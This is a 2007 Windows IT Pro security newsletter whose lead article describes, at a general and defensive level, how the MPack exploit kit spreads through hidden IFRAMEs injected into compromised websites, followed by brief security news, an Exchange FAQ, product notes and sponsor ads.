Risky Business: Managing Risk Through Security
http://list.windowsitpro.com/t?ctl=5BC1B:4160B336D0B60CB1E7712365DBE4E093
Keep Unsecured Machines Off Your Network
http://list.windowsitpro.com/t?ctl=5BC1D:4160B336D0B60CB1E7712365DBE4E093
Automated GLBA Security Compliance: Free Report
http://list.windowsitpro.com/t?ctl=5BC2B:4160B336D0B60CB1E7712365DBE4E093
=== CONTENTS ===================================================
IN FOCUS: MPack Runs Rampant
NEWS AND FEATURES
- Latest ZLOB Plays on People's Desire for Online Video
- HP to Provide Web Application Security
- PatchLink Moves to Unify Protection and Control
- Recent Security Vulnerabilities
GIVE AND TAKE
- Security Matters Blog: Hack the Beta--Win a Game Box
- FAQ: Preparing AD for Exchange 2007
- From the Forum: Preventing Power Users from Creating Shares
- Share Your Security Tips
PRODUCTS
- Continuous Authentication and Encryption
- Wanted: Your Reviews of Products
RESOURCES AND EVENTS
FEATURED WHITE PAPER
ANNOUNCEMENTS
=== SPONSOR: Neverfail =========================================
Risky Business: Managing Risk Through Security
Every business faces risk. Have you properly assessed your company's
risk and put a focus on business continuity? Attend this free Web
seminar and learn how you can ensure seamless recovery of your key
systems and keep your users continuously connected. On-demand Web
seminar.
http://list.windowsitpro.com/t?ctl=5BC1B:4160B336D0B60CB1E7712365DBE4E093
=== IN FOCUS: MPack Runs Rampant =============
by Mark Joseph Edwards, News Editor, mark at ntsecurity / net
The need to secure your Web servers has never been higher. In the past,
many people worried about potential damage to their company's
reputation should their site be broken into. After all, a defacement
negatively affects not only a Web site but also a company's public
image.
But there's another more dangerous aspect to keep in mind: Your site
might be turned into a vicious attack vector, making you responsible
for damaging any number of innocent peoples' computers. Anyone with a
public-facing Web site has a serious responsibility to protect its
visitors. And if you're hosting other peoples' Web sites, your level of
responsibility is exponentially higher.
A case in point that clearly demonstrates the need for vigilance is the
relatively new MPack tool--not to be confused with the compression
software of the same name.
MPack is an automated, intelligent, server-based attack tool that is
being used to infect untold numbers of computers. It's basically like
Metasploit, except that targets are pushed towards MPack en masse. The
tool is PHP-based and is a flexible attack platform complete with a
back-end management and monitoring interface. The server components are
used to deliver exploit payloads to browsers, and people place links to
an MPack server into Web pages all over the Internet.
The primary motive of MPack is to generate income through criminal
activity. Its creators have been selling the tool for about $700 since
at least December 2006 along with attack modules that evolve as new
attack types become possible. According to Panda Labs, new modules cost
anywhere from $50 to $150 depending on the level of exploitation a
module can carry out.
Recently, intruders using MPack established domains to host Web sites
to contain links to attack code and broke into numerous Web hosting
accounts (and quite possibly privately operated Web sites) to include
attack code in the pages of those unsuspecting, compromised Web sites.
The attack code typically consists of IFRAME tags that tell a visitor's
browser to load a malicious Web page inside an existing Web page. The
browser can be instructed to load a malicious Web page without the user
having to take any action other than to visit the compromised Web site,
and the IFRAME can be coded to not even be noticeable on the
compromised site. So the visitor might remain completely unaware that
exploitation is taking place.
The malicious Web page contains code that, when run, can determine the
visitor's OS and browser type and then deliver corresponding exploit
code. Code exists to exploit Windows, Linux, BSD, and Mac OS systems as
well as at least seven browsers and various components, such as Apple
QuickTime, WinZip, and other common tools. MPack can also be made to
instruct a vulnerable computer to download malicious files. From there,
a huge range of possibilities opens up.
Panda Labs reports that one Web server recently inspected contains
7,644 Web pages infected with links to MPack-based exploits. Exactly
how many sites and pages have been infected remains unknown; however
one trusted source told me that at least one major hosting company
(which I won't name) found that its servers were compromised through a
combination of exploits, and as a result, a large number of index.php
files were overwritten to contain exploits based on MPack.
In that incident, I was able to take a look at several of the affected
sites because I know the operators of those sites. The intruders made a
puzzling choice to completely overwrite every file that contained the
string "index" with a simple IFRAME tag to launch exploits. Since all
the index pages for the affected sites suddenly started showing up
empty, the break-in became obvious sooner rather than later.
I have no idea why the intrusion was made so obvious. Had the intruders
inserted an IFRAME tag into existing HTML instead of overwriting pages
entirely, the intrusion could have gone undetected for a very long
time, and the number of infected computers would have risen
tremendously.
If you're interested in more details about MPack, Panda Labs published
a detailed analysis of the MPack attack platform, available at the URL
below in PDF format.
http://list.windowsitpro.com/t?ctl=5BC20:4160B336D0B60CB1E7712365DBE4E093
=== SPONSOR: St. Bernard Software ==============================
Keep Unsecured Machines Off Your Network
Tune into the hottest up-to-date network security protection through
this exclusive podcast featuring Windows IT Pro editor Karen Forster
and Microsoft's Ian Hameroff. Learn how Network Access Control (NAC)
and Network Access Protection (NAP) work and what technologies are
involved, as well as what third-party products are poised to work with
these technologies.
http://list.windowsitpro.com/t?ctl=5BC1D:4160B336D0B60CB1E7712365DBE4E093
=== SECURITY NEWS AND FEATURES =================================
Latest ZLOB Plays on People's Desire for Online Video
While ZLOB has been tracked in more than 1,000 renditions since late
2005, several security firms reported that the latest ZLOB outbreak
takes social engineering to a new extreme to lure people into its trap.
http://list.windowsitpro.com/t?ctl=5BC28:4160B336D0B60CB1E7712365DBE4E093
HP to Provide Web Application Security
HP will acquire SPI Dynamics, maker and provider of Web application
security assessment software and services.
http://list.windowsitpro.com/t?ctl=5BC27:4160B336D0B60CB1E7712365DBE4E093
PatchLink Moves to Unify Protection and Control
PatchLink will acquire SecureWave, thereby taking another step
towards unified protection and control.
http://list.windowsitpro.com/t?ctl=5BC29:4160B336D0B60CB1E7712365DBE4E093
Recent Security Vulnerabilities
If you subscribe to this newsletter, you also receive Security
Alerts, which inform you about recently discovered security
vulnerabilities. You can also find information about these
discoveries at
http://list.windowsitpro.com/t?ctl=5BC22:4160B336D0B60CB1E7712365DBE4E093
=== SPONSOR: Qualys ============================================
Automated GLBA Security Compliance: Free Report
Compliance and knowledge of every aspect of the GLBA is mandatory.
Through web services, on demand security is automated and immediate
compliance to the GLBA safeguard guidelines is achieved. Learn how
comprehensive GLBA compliance is managed through internal and external
audits.
http://list.windowsitpro.com/t?ctl=5BC2B:4160B336D0B60CB1E7712365DBE4E093
=== GIVE AND TAKE ==============================================
SECURITY MATTERS BLOG: Hack the Beta--Win a Game Box
by Mark Joseph Edwards, http://list.windowsitpro.com/t?ctl=5BC2F:4160B336D0B60CB1E7712365DBE4E093
Here's an opportunity to put a beta security product through the
wringer and possibly win one of several game boxes in the process.
http://list.windowsitpro.com/t?ctl=5BC1E:4160B336D0B60CB1E7712365DBE4E093
FAQ: Preparing AD for Exchange 2007
by John Savill, http://list.windowsitpro.com/t?ctl=5BC2D:4160B336D0B60CB1E7712365DBE4E093
Q: How do I manually prepare my AD forest and domain for Exchange
Server 2007?
Find the answer at
http://list.windowsitpro.com/t?ctl=5BC2A:4160B336D0B60CB1E7712365DBE4E093
FROM THE FORUM: Preventing Power Users from Creating Shares
A forum participant wants to disallow power users from creating or
modifying shares. He's looked through Group Policy Objects (GPOs) and
can't find a way to remove the Shares snap-in under Computer Management
or just lock it out. If prevention isn't possible, is there a way to
turn on auditing for share creation? To join the discussion, go to
http://list.windowsitpro.com/t?ctl=5BC1A:4160B336D0B60CB1E7712365DBE4E093
SHARE YOUR SECURITY TIPS AND GET $100
Share your security-related tips, comments, or problems and
solutions in Security Pro VIP's Reader to Reader column. Email your
contributions to r2r@securityprovip.com. If we print your submission,
you'll get $100. We edit submissions for style, grammar, and length.
=== PRODUCTS ===================================================
by Renee Munshi, products@windowsitpro.com
Continuous Authentication and Encryption
2factor announced Real Privacy Management (RPM), a two-factor
private-key software solution that can be deployed standalone or inside
a software application, device, or chip. RPM continuously generates new
256-bit secret keys that are used to mutually authenticate each party
and to encrypt/decrypt every data transmission in real time. 2factor
also announced SecureWeb, a small auto-loading applet that invokes a
secure instance of the user's default browser. SecureWeb runs RPM to
authenticate and encrypt sensitive transactions. For more information,
go to
http://list.windowsitpro.com/t?ctl=5BC33:4160B336D0B60CB1E7712365DBE4E093
WANTED: your reviews of products you've tested and used in
production. Send your experiences and ratings of products to
whatshot@windowsitpro.com and get a Best Buy gift certificate.
=== RESOURCES AND EVENTS =======================================
For more security-related resources, visit
http://list.windowsitpro.com/t?ctl=5BC2C:4160B336D0B60CB1E7712365DBE4E093
Black Hat USA 2007, July 28-August 2 in Las Vegas, is the world's
premier technical event for ICT security experts. Choose from 30 hands-
on training courses and 90 briefings presentations with lots of new
content and new tools. Network with 4,000 delegates from 70 nations.
Visit product displays by 30 top sponsors in a relaxed setting.
http://list.windowsitpro.com/t?ctl=5BC32:4160B336D0B60CB1E7712365DBE4E093
Improve the security of Linux and UNIX computers by letting them
authenticate and authorize users through Microsoft Active Directory.
This white paper shows how you can lower costs, improve security,
simplify user account management, and demonstrate compliance with
regulatory requirements.
http://list.windowsitpro.com/t?ctl=5BC1F:4160B336D0B60CB1E7712365DBE4E093
Gain control over the growing amount of file data in your enterprise.
Learn how file area networks can help you centralize file
consolidation, migration, replication, and failover. Download this
eBook and start streamlining your file management projects today!
http://list.windowsitpro.com/t?ctl=5BC21:4160B336D0B60CB1E7712365DBE4E093
=== FEATURED WHITE PAPER =======================================
One of the main concerns in the IT industry today is security. This
white paper, written by Microsoft MVP for Terminal Services Claudio
Rodrigues, takes a deep look at security concerns, the available
solutions, their drawbacks, and a new complementary way of addressing
today's security issues.
http://list.windowsitpro.com/t?ctl=5BC1C:4160B336D0B60CB1E7712365DBE4E093
=== ANNOUNCEMENTS ==============================================
Introducing a Unique Exchange and Outlook Resource
Exchange & Outlook Pro VIP is an online information center that
delivers new articles every week on messaging topics such as
administration, migration, security, and performance. Subscribers also
receive tips, cautionary advice, direct access to our editors, and a
host of other benefits. Order now at an exclusive charter rate and save
up to $50!
http://list.windowsitpro.com/t?ctl=5BC24:4160B336D0B60CB1E7712365DBE4E093
Special Invitation for VIP Access
Become a VIP subscriber and get continuous inside access to all the
content published in Windows IT Pro, SQL Server Magazine, Exchange &
Outlook Pro VIP, Scripting Pro VIP, and Security Pro VIP. Subscribe
now!
http://list.windowsitpro.com/t?ctl=5BC23:4160B336D0B60CB1E7712365DBE4E093
================================================================
Security UDPATE is brought to you by the Windows IT Pro Web site's
Security page (first URL below) and Security Pro VIP (second URL
below).
http://list.windowsitpro.com/t?ctl=5BC2E:4160B336D0B60CB1E7712365DBE4E093
http://list.windowsitpro.com/t?ctl=5BC31:4160B336D0B60CB1E7712365DBE4E093
Subscribe to Security UPDATE at
http://list.windowsitpro.com/t?ctl=5BC26:4160B336D0B60CB1E7712365DBE4E093
Unsubscribe by clicking
http://list.windowsitpro.com/u?id=4160B336D0B60CB1E7712365DBE4E093
Be sure to add Security_UPDATE@list.windowsitpro.com
to your antispam software's list of allowed senders.
To contact us:
About Security UPDATE content -- letters@windowsitpro.com
About technical questions -- http://list.windowsitpro.com/t?ctl=5BC30:4160B336D0B60CB1E7712365DBE4E093
About your product news -- products@windowsitpro.com
About your subscription -- windowsitproupdate@windowsitpro.com
About sponsoring Security UPDATE -- salesopps@windowsitpro.com
View the Windows IT Pro privacy policy at
http://list.windowsitpro.com/t?ctl=5BC25:4160B336D0B60CB1E7712365DBE4E093
Windows IT Pro, a division of Penton Media, Inc.
221 East 29th Street, Loveland, CO 80538
Attention: Customer Service Department
Copyright 2007, Penton Media, Inc. All rights reserved.
No comments:
Post a Comment